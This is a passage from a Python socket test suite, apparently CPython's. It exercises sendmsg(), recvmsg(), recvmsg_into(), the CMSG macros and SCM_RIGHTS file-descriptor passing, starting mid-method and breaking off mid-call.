        defaultunset = self.msg_flags_common_unset

        if eor:
            defaultset |= self.msg_flags_eor_indicator
            defaultunset |= self.msg_flags_non_eor_indicator
        elif eor is not None:
            defaultset |= self.msg_flags_non_eor_indicator
            defaultunset |= self.msg_flags_eor_indicator

        # Function arguments override defaults
        defaultset &= ~checkunset
        defaultunset &= ~checkset

        # Merge arguments with remaining defaults, and check for conflicts
        checkset |= defaultset
        checkunset |= defaultunset
        inboth = checkset & checkunset & ~ignore
        if inboth:
            raise Exception("contradictory set, unset requirements for flags "
                            "{0:#x}".format(inboth))

        # Compare with given msg_flags value
        mask = (checkset | checkunset) & ~ignore
        self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
    """Mixin implementing doRecvmsg() on top of recvmsg_into()."""

    def doRecvmsg(self, sock, bufsize, *args):
        # Receive into a pre-allocated buffer, then repackage the result
        # in the same (data, ancdata, flags, addr) shape recvmsg() uses.
        buf = bytearray(bufsize)
        result = sock.recvmsg_into([buf], *args)
        self.registerRecvmsgResult(result)
        nbytes = result[0]
        self.assertGreaterEqual(nbytes, 0)
        self.assertLessEqual(nbytes, bufsize)
        return (bytes(buf[:nbytes]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
    """Adds the msg_flags bits expected on datagram sockets."""

    @property
    def msg_flags_non_eor_indicator(self):
        # A truncated datagram is signalled via MSG_TRUNC.
        return socket.MSG_TRUNC | super().msg_flags_non_eor_indicator
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
    """Adds the msg_flags bits expected on SCTP sockets."""

    @property
    def msg_flags_eor_indicator(self):
        # A complete SCTP record is signalled via MSG_EOR.
        return socket.MSG_EOR | super().msg_flags_eor_indicator
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
    """Maps unconnected sockets (attributes cli/serv) onto the generic
    cli_sock/serv_sock API and supplies a default destination address."""

    @property
    def serv_sock(self):
        return self.serv

    @property
    def cli_sock(self):
        return self.cli

    @property
    def sendmsg_to_server_defaults(self):
        # (buffers, ancdata, flags, address)
        return ([], [], 0, self.serv_addr)

    def sendToServer(self, msg):
        # Unconnected sockets must name the destination explicitly.
        return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
    """Maps connected sockets onto the cli_sock/serv_sock API.

    Note the deliberate crossover: serv_conn is the connection *to* the
    server (held by the client) and cli_conn the connection *to* the
    client (held by the server).
    """

    @property
    def serv_sock(self):
        return self.cli_conn

    @property
    def cli_sock(self):
        return self.serv_conn

    def checkRecvmsgAddress(self, addr1, addr2):
        # Address is currently "unspecified" for a connected socket,
        # so we don't examine it
        pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
    """Applies fail_timeout to the server socket so hung tests fail fast."""

    def setUp(self):
        super().setUp()
        self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
    """Tests for sendmsg() which can use any socket type and do not
    involve recvmsg() or recvmsg_into().

    Each test* method receives in the server thread what the paired
    _test* method sends from the client thread; the trailing b"done"
    sentinel in the error tests confirms the client completed.
    """

    def testSendmsg(self):
        # Send a simple message with sendmsg().
        self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)

    def _testSendmsg(self):
        self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))

    def testSendmsgDataGenerator(self):
        # Send from buffer obtained from a generator (not a sequence).
        self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)

    def _testSendmsgDataGenerator(self):
        self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
                         len(MSG))

    def testSendmsgAncillaryGenerator(self):
        # Gather (empty) ancillary data from a generator.
        self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)

    def _testSendmsgAncillaryGenerator(self):
        self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
                         len(MSG))

    def testSendmsgArray(self):
        # Send data from an array instead of the usual bytes object.
        self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)

    def _testSendmsgArray(self):
        self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
                         len(MSG))

    def testSendmsgGather(self):
        # Send message data from more than one buffer (gather write).
        self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)

    def _testSendmsgGather(self):
        self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))

    def testSendmsgBadArgs(self):
        # Check that sendmsg() rejects invalid arguments.
        self.assertEqual(self.serv_sock.recv(1000), b"done")

    def _testSendmsgBadArgs(self):
        self.assertRaises(TypeError, self.cli_sock.sendmsg)
        self.assertRaises(TypeError, self.sendmsgToServer,
                          b"not in an iterable")
        self.assertRaises(TypeError, self.sendmsgToServer,
                          object())
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [object()])
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG, object()])
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], object())
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [], object())
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [], 0, object())
        # Tell the server we finished without sending a valid message.
        self.sendToServer(b"done")

    def testSendmsgBadCmsg(self):
        # Check that invalid ancillary data items are rejected.
        self.assertEqual(self.serv_sock.recv(1000), b"done")

    def _testSendmsgBadCmsg(self):
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [object()])
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [(object(), 0, b"data")])
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [(0, object(), b"data")])
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [(0, 0, object())])
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [(0, 0)])
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [(0, 0, b"data", 42)])
        self.sendToServer(b"done")

    @requireAttrs(socket, "CMSG_SPACE")
    def testSendmsgBadMultiCmsg(self):
        # Check that invalid ancillary data items are rejected when
        # more than one item is present.
        self.assertEqual(self.serv_sock.recv(1000), b"done")

    # client_skip mirrors the server-side skip condition onto the
    # client half of the pair.
    @testSendmsgBadMultiCmsg.client_skip
    def _testSendmsgBadMultiCmsg(self):
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [0, 0, b""])
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [(0, 0, b""), object()])
        self.sendToServer(b"done")

    def testSendmsgExcessCmsgReject(self):
        # Check that sendmsg() rejects excess ancillary data items
        # when the number that can be sent is limited.
        self.assertEqual(self.serv_sock.recv(1000), b"done")

    def _testSendmsgExcessCmsgReject(self):
        if not hasattr(socket, "CMSG_SPACE"):
            # Can only send one item
            with self.assertRaises(OSError) as cm:
                self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
            self.assertIsNone(cm.exception.errno)
        self.sendToServer(b"done")

    def testSendmsgAfterClose(self):
        # Check that sendmsg() fails on a closed socket.
        pass

    def _testSendmsgAfterClose(self):
        self.cli_sock.close()
        self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
    """Tests for sendmsg() which require a stream socket and do not
    involve recvmsg() or recvmsg_into()."""

    def testSendmsgExplicitNoneAddr(self):
        # Check that peer address can be specified as None.
        self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)

    def _testSendmsgExplicitNoneAddr(self):
        self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))

    def testSendmsgTimeout(self):
        # Check that timeout works with sendmsg().
        self.assertEqual(self.serv_sock.recv(512), b"a"*512)
        # Wait for the client to observe the timeout before returning.
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))

    def _testSendmsgTimeout(self):
        try:
            self.cli_sock.settimeout(0.03)
            with self.assertRaises(socket.timeout):
                # Keep sending until the send buffer fills and the
                # short timeout fires.
                while True:
                    self.sendmsgToServer([b"a"*512])
        finally:
            # Always unblock the waiting server half.
            self.misc_event.set()

    # XXX: would be nice to have more tests for sendmsg flags argument.

    # Linux supports MSG_DONTWAIT when sending, but in general, it
    # only works when receiving.  Could add other platforms if they
    # support it too.
    @skipWithClientIf(sys.platform not in {"linux"},
                      "MSG_DONTWAIT not known to work on this platform when "
                      "sending")
    def testSendmsgDontWait(self):
        # Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
        self.assertEqual(self.serv_sock.recv(512), b"a"*512)
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))

    @testSendmsgDontWait.client_skip
    def _testSendmsgDontWait(self):
        try:
            with self.assertRaises(OSError) as cm:
                while True:
                    self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
            # Non-blocking send reports EAGAIN/EWOULDBLOCK once full.
            self.assertIn(cm.exception.errno,
                          (errno.EAGAIN, errno.EWOULDBLOCK))
        finally:
            self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
    """Tests for sendmsg() which require a connectionless-mode
    (e.g. datagram) socket, and do not involve recvmsg() or
    recvmsg_into().
    """

    def testSendmsgNoDestAddr(self):
        # Check that sendmsg() fails when no destination address is
        # given for unconnected socket.
        # Server side does nothing; the failure is checked client-side.
        pass

    def _testSendmsgNoDestAddr(self):
        # Try both with and without the optional arguments supplied.
        self.assertRaises(OSError, self.cli_sock.sendmsg,
                          [MSG])
        self.assertRaises(OSError, self.cli_sock.sendmsg,
                          [MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
    """Tests for recvmsg() which can also be emulated using
    recvmsg_into(), and can use any socket type.

    doRecvmsg() dispatches to recvmsg() or recvmsg_into() depending on
    the mixin in use; server-side testFoo() methods pair with
    client-side _testFoo() methods run in the other thread.
    """

    def testRecvmsg(self):
        # Receive a simple message with recvmsg[_into]().
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsg(self):
        self.sendToServer(MSG)

    def testRecvmsgExplicitDefaults(self):
        # Test recvmsg[_into]() with default arguments provided explicitly.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), 0, 0)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgExplicitDefaults(self):
        self.sendToServer(MSG)

    def testRecvmsgShorter(self):
        # Receive a message smaller than buffer.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG) + 42)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgShorter(self):
        self.sendToServer(MSG)

    def testRecvmsgTrunc(self):
        # Receive part of message, check for truncation indicators.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG) - 3)
        self.assertEqual(msg, MSG[:-3])
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        # eor=False: the end-of-record marker must NOT be set, since
        # the message was only partially received.
        self.checkFlags(flags, eor=False)

    def _testRecvmsgTrunc(self):
        self.sendToServer(MSG)

    def testRecvmsgShortAncillaryBuf(self):
        # Test ancillary data buffer too small to hold any ancillary data.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), 1)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgShortAncillaryBuf(self):
        self.sendToServer(MSG)

    def testRecvmsgLongAncillaryBuf(self):
        # Test large ancillary data buffer.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), 10240)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgLongAncillaryBuf(self):
        self.sendToServer(MSG)

    def testRecvmsgAfterClose(self):
        # Check that recvmsg[_into]() fails on a closed socket.
        self.serv_sock.close()
        self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)

    def _testRecvmsgAfterClose(self):
        pass

    def testRecvmsgTimeout(self):
        # Check that timeout works.
        try:
            self.serv_sock.settimeout(0.03)
            self.assertRaises(socket.timeout,
                              self.doRecvmsg, self.serv_sock, len(MSG))
        finally:
            # Let the client know it may exit.
            self.misc_event.set()

    def _testRecvmsgTimeout(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))

    @requireAttrs(socket, "MSG_PEEK")
    def testRecvmsgPeek(self):
        # Check that MSG_PEEK in flags enables examination of pending
        # data without consuming it.

        # Receive part of data with MSG_PEEK.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG) - 3, 0,
                                                   socket.MSG_PEEK)
        self.assertEqual(msg, MSG[:-3])
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        # Ignoring MSG_TRUNC here (so this test is the same for stream
        # and datagram sockets).  Some wording in POSIX seems to
        # suggest that it needn't be set when peeking, but that may
        # just be a slip.
        self.checkFlags(flags, eor=False,
                        ignore=getattr(socket, "MSG_TRUNC", 0))

        # Receive all data with MSG_PEEK.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), 0,
                                                   socket.MSG_PEEK)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

        # Check that the same data can still be received normally.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    @testRecvmsgPeek.client_skip
    def _testRecvmsgPeek(self):
        self.sendToServer(MSG)

    @requireAttrs(socket.socket, "sendmsg")
    def testRecvmsgFromSendmsg(self):
        # Test receiving with recvmsg[_into]() when message is sent
        # using sendmsg().
        self.serv_sock.settimeout(self.fail_timeout)
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    @testRecvmsgFromSendmsg.client_skip
    def _testRecvmsgFromSendmsg(self):
        # Send MSG in two pieces via a single sendmsg() call.
        self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
    """Tests which require a stream socket and can use either recvmsg()
    or recvmsg_into().
    """

    def testRecvmsgEOF(self):
        # Receive end-of-stream indicator (b"", peer socket closed).
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
        self.assertEqual(msg, b"")
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=None)  # Might not have end-of-record marker

    def _testRecvmsgEOF(self):
        self.cli_sock.close()

    def testRecvmsgOverflow(self):
        # Receive a message in more than one chunk.
        seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                    len(MSG) - 3)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=False)

        seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

        # The two segments together must reconstruct the message.
        msg = seg1 + seg2
        self.assertEqual(msg, MSG)

    def _testRecvmsgOverflow(self):
        self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
    """Tests for recvmsg() which can use any socket type."""

    def testRecvmsgBadArgs(self):
        # Check that recvmsg() rejects invalid arguments.
        self.assertRaises(TypeError, self.serv_sock.recvmsg)
        # Negative sizes raise ValueError ...
        self.assertRaises(ValueError, self.serv_sock.recvmsg,
                          -1, 0, 0)
        self.assertRaises(ValueError, self.serv_sock.recvmsg,
                          len(MSG), -1, 0)
        # ... while wrongly-typed arguments raise TypeError.
        self.assertRaises(TypeError, self.serv_sock.recvmsg,
                          [bytearray(10)], 0, 0)
        self.assertRaises(TypeError, self.serv_sock.recvmsg,
                          object(), 0, 0)
        self.assertRaises(TypeError, self.serv_sock.recvmsg,
                          len(MSG), object(), 0)
        self.assertRaises(TypeError, self.serv_sock.recvmsg,
                          len(MSG), 0, object())

        # A valid call still succeeds after the rejected ones.
        msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgBadArgs(self):
        self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
    """Tests for recvmsg_into() which can use any socket type."""

    def testRecvmsgIntoBadArgs(self):
        # Check that recvmsg_into() rejects invalid arguments.
        buf = bytearray(len(MSG))
        self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
        # First argument must be an iterable of writable buffers.
        self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
                          len(MSG), 0, 0)
        self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
                          buf, 0, 0)
        self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
                          [object()], 0, 0)
        self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
                          [b"I'm not writable"], 0, 0)
        self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
                          [buf, object()], 0, 0)
        self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
                          [buf], -1, 0)
        self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
                          [buf], object(), 0)
        self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
                          [buf], 0, object())

        # A valid call still succeeds after the rejected ones.
        nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
        self.assertEqual(nbytes, len(MSG))
        self.assertEqual(buf, bytearray(MSG))
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgIntoBadArgs(self):
        self.sendToServer(MSG)

    def testRecvmsgIntoGenerator(self):
        # Receive into buffer obtained from a generator (not a sequence).
        buf = bytearray(len(MSG))
        nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
            (o for o in [buf]))
        self.assertEqual(nbytes, len(MSG))
        self.assertEqual(buf, bytearray(MSG))
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgIntoGenerator(self):
        self.sendToServer(MSG)

    def testRecvmsgIntoArray(self):
        # Receive into an array rather than the usual bytearray.
        buf = array.array("B", [0] * len(MSG))
        nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
        self.assertEqual(nbytes, len(MSG))
        self.assertEqual(buf.tobytes(), MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgIntoArray(self):
        self.sendToServer(MSG)

    def testRecvmsgIntoScatter(self):
        # Receive into multiple buffers (scatter write).
        b1 = bytearray(b"----")
        b2 = bytearray(b"0123456789")
        b3 = bytearray(b"--------------")
        # The memoryview slice writes into the middle of b2 only.
        nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
            [b1, memoryview(b2)[2:9], b3])
        self.assertEqual(nbytes, len(b"Mary had a little lamb"))
        self.assertEqual(b1, bytearray(b"Mary"))
        self.assertEqual(b2, bytearray(b"01 had a 9"))
        self.assertEqual(b3, bytearray(b"little lamb---"))
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgIntoScatter(self):
        self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
    """Sanity checks for the CMSG_LEN() and CMSG_SPACE() macros.

    These verify assumptions that sendmsg() and recvmsg[_into]()
    (which share code with the macros) rely on.
    """

    # Match the definition in socketmodule.c
    try:
        import _testcapi
    except ImportError:
        socklen_t_limit = 0x7fffffff
    else:
        socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)

    @requireAttrs(socket, "CMSG_LEN")
    def testCMSG_LEN(self):
        """Exercise CMSG_LEN() over small and near-limit sizes."""
        over_limit = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
        probe_sizes = list(range(257)) + list(range(over_limit - 257,
                                                    over_limit))

        # struct cmsghdr has at least three members, two of which are ints
        self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
        for size in probe_sizes:
            result = socket.CMSG_LEN(size)
            # This is how recvmsg() calculates the data size
            self.assertEqual(result - socket.CMSG_LEN(0), size)
            self.assertLessEqual(result, self.socklen_t_limit)

        self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
        # sendmsg() shares code with these functions, and requires
        # that it reject values over the limit.
        self.assertRaises(OverflowError, socket.CMSG_LEN, over_limit)
        self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)

    @requireAttrs(socket, "CMSG_SPACE")
    def testCMSG_SPACE(self):
        """Exercise CMSG_SPACE() over small and near-limit sizes."""
        over_limit = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
        probe_sizes = list(range(257)) + list(range(over_limit - 257,
                                                    over_limit))

        prev = socket.CMSG_SPACE(0)
        # struct cmsghdr has at least three members, two of which are ints
        self.assertGreater(prev, array.array("i").itemsize * 2)
        for size in probe_sizes:
            result = socket.CMSG_SPACE(size)
            # CMSG_SPACE() must be monotonic and never smaller than
            # CMSG_LEN() for the same payload size.
            self.assertGreaterEqual(result, prev)
            self.assertGreaterEqual(result, socket.CMSG_LEN(size))
            self.assertGreaterEqual(result, size + socket.CMSG_LEN(0))
            self.assertLessEqual(result, self.socklen_t_limit)
            prev = result

        self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
        # sendmsg() shares code with these functions, and requires
        # that it reject values over the limit.
        self.assertRaises(OverflowError, socket.CMSG_SPACE, over_limit)
        self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
    """Tests for file descriptor passing on Unix-domain sockets."""

    # Invalid file descriptor value that's unlikely to evaluate to a
    # real FD even if one of its bytes is replaced with a different
    # value (which shouldn't actually happen).
    badfd = -0x5555

    def newFDs(self, n):
        # Return a list of n file descriptors for newly-created files
        # containing their list indices as ASCII numbers.
        fds = []
        for i in range(n):
            fd, path = tempfile.mkstemp()
            self.addCleanup(os.unlink, path)
            self.addCleanup(os.close, fd)
            os.write(fd, str(i).encode())
            fds.append(fd)
        return fds

    def checkFDs(self, fds):
        # Check that the file descriptors in the given list contain
        # their correct list indices as ASCII numbers.
        for n, fd in enumerate(fds):
            os.lseek(fd, 0, os.SEEK_SET)
            self.assertEqual(os.read(fd, 1024), str(n).encode())

    def registerRecvmsgResult(self, result):
        # Ensure any FDs received in ancillary data get closed on cleanup.
        self.addCleanup(self.closeRecvmsgFDs, result)

    def closeRecvmsgFDs(self, recvmsg_result):
        # Close all file descriptors specified in the ancillary data
        # of the given return value from recvmsg() or recvmsg_into().
        for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
            if (cmsg_level == socket.SOL_SOCKET and
                    cmsg_type == socket.SCM_RIGHTS):
                # Truncate to a whole number of ints before decoding.
                fds = array.array("i")
                fds.frombytes(cmsg_data[:
                        len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
                for fd in fds:
                    os.close(fd)

    def createAndSendFDs(self, n):
        # Send n new file descriptors created by newFDs() to the
        # server, with the constant MSG as the non-ancillary data.
        self.assertEqual(
            self.sendmsgToServer([MSG],
                                 [(socket.SOL_SOCKET,
                                   socket.SCM_RIGHTS,
                                   array.array("i", self.newFDs(n)))]),
            len(MSG))

    def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
        # Check that constant MSG was received with numfds file
        # descriptors in a maximum of maxcmsgs control messages (which
        # must contain only complete integers).  By default, check
        # that MSG_CTRUNC is unset, but ignore any flags in
        # ignoreflags.
        msg, ancdata, flags, addr = result
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
                        ignore=ignoreflags)

        self.assertIsInstance(ancdata, list)
        self.assertLessEqual(len(ancdata), maxcmsgs)
        fds = array.array("i")
        for item in ancdata:
            self.assertIsInstance(item, tuple)
            cmsg_level, cmsg_type, cmsg_data = item
            self.assertEqual(cmsg_level, socket.SOL_SOCKET)
            self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
            self.assertIsInstance(cmsg_data, bytes)
            # Each control message must contain whole ints only.
            self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
            fds.frombytes(cmsg_data)

        self.assertEqual(len(fds), numfds)
        self.checkFDs(fds)

    def testFDPassSimple(self):
        # Pass a single FD (array read from bytes object).
        self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
                                               len(MSG), 10240))

    def _testFDPassSimple(self):
        self.assertEqual(
            self.sendmsgToServer(
                [MSG],
                [(socket.SOL_SOCKET,
                  socket.SCM_RIGHTS,
                  array.array("i", self.newFDs(1)).tobytes())]),
            len(MSG))

    def testMultipleFDPass(self):
        # Pass multiple FDs in a single array.
        self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
                                               len(MSG), 10240))

    def _testMultipleFDPass(self):
        self.createAndSendFDs(4)

    @requireAttrs(socket, "CMSG_SPACE")
    def testFDPassCMSG_SPACE(self):
        # Test using CMSG_SPACE() to calculate ancillary buffer size.
        self.checkRecvmsgFDs(
            4, self.doRecvmsg(self.serv_sock, len(MSG),
                              socket.CMSG_SPACE(4 * SIZEOF_INT)))

    @testFDPassCMSG_SPACE.client_skip
    def _testFDPassCMSG_SPACE(self):
        self.createAndSendFDs(4)

    def testFDPassCMSG_LEN(self):
        # Test using CMSG_LEN() to calculate ancillary buffer size.
        self.checkRecvmsgFDs(1,
                             self.doRecvmsg(self.serv_sock, len(MSG),
                                            socket.CMSG_LEN(4 * SIZEOF_INT)),
                             # RFC 3542 says implementations may set
                             # MSG_CTRUNC if there isn't enough space
                             # for trailing padding.
                             ignoreflags=socket.MSG_CTRUNC)

    def _testFDPassCMSG_LEN(self):
        self.createAndSendFDs(1)

    @unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
    @unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
    @requireAttrs(socket, "CMSG_SPACE")
    def testFDPassSeparate(self):
        # Pass two FDs in two separate arrays.  Arrays may be combined
        # into a single control message by the OS.
        self.checkRecvmsgFDs(2,
                             self.doRecvmsg(self.serv_sock, len(MSG), 10240),
                             maxcmsgs=2)

    @testFDPassSeparate.client_skip
    @unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
    @unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
    def _testFDPassSeparate(self):
        fd0, fd1 = self.newFDs(2)
        self.assertEqual(
            self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
                                          socket.SCM_RIGHTS,
                                          array.array("i", [fd0])),
                                         (socket.SOL_SOCKET,
                                          socket.SCM_RIGHTS,
                                          array.array("i", [fd1]))]),
            len(MSG))

    @unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
    @unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
    @requireAttrs(socket, "CMSG_SPACE")
    def testFDPassSeparateMinSpace(self):
        # Pass two FDs in two separate arrays, receiving them into the
        # minimum space for two arrays.
        self.checkRecvmsgFDs(2,
                             self.doRecvmsg(self.serv_sock, len(MSG),
                                            socket.CMSG_SPACE(SIZEOF_INT) +
                                            socket.CMSG_LEN(SIZEOF_INT)),
                             maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)

    @testFDPassSeparateMinSpace.client_skip
    @unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
    @unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
    def _testFDPassSeparateMinSpace(self):
        fd0, fd1 = self.newFDs(2)
        self.assertEqual(
            self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
                                          socket.SCM_RIGHTS,
                                          array.array("i", [fd0])),
                                         (socket.SOL_SOCKET,
                                          socket.SCM_RIGHTS,
                                          array.array("i", [fd1]))]),
            len(MSG))

    def sendAncillaryIfPossible(self, msg, ancdata):
        # Try to send msg and ancdata to server, but if the system
        # call fails, just send msg with no ancillary data.
        try:
            nbytes = self.sendmsgToServer([msg], ancdata)
        except OSError as e:
            # Check that it was the system call that failed
            self.assertIsInstance(e.errno, int)
            nbytes = self.sendmsgToServer([msg])
        self.assertEqual(nbytes, len(msg))

    @unittest.skipIf(sys.platform == "darwin", "see issue #24725")
    def testFDPassEmpty(self):
        # Try to pass an empty FD array.  Can receive either no array
        # or an empty array.
        self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
                                               len(MSG), 10240),
                             ignoreflags=socket.MSG_CTRUNC)

    def _testFDPassEmpty(self):
        self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
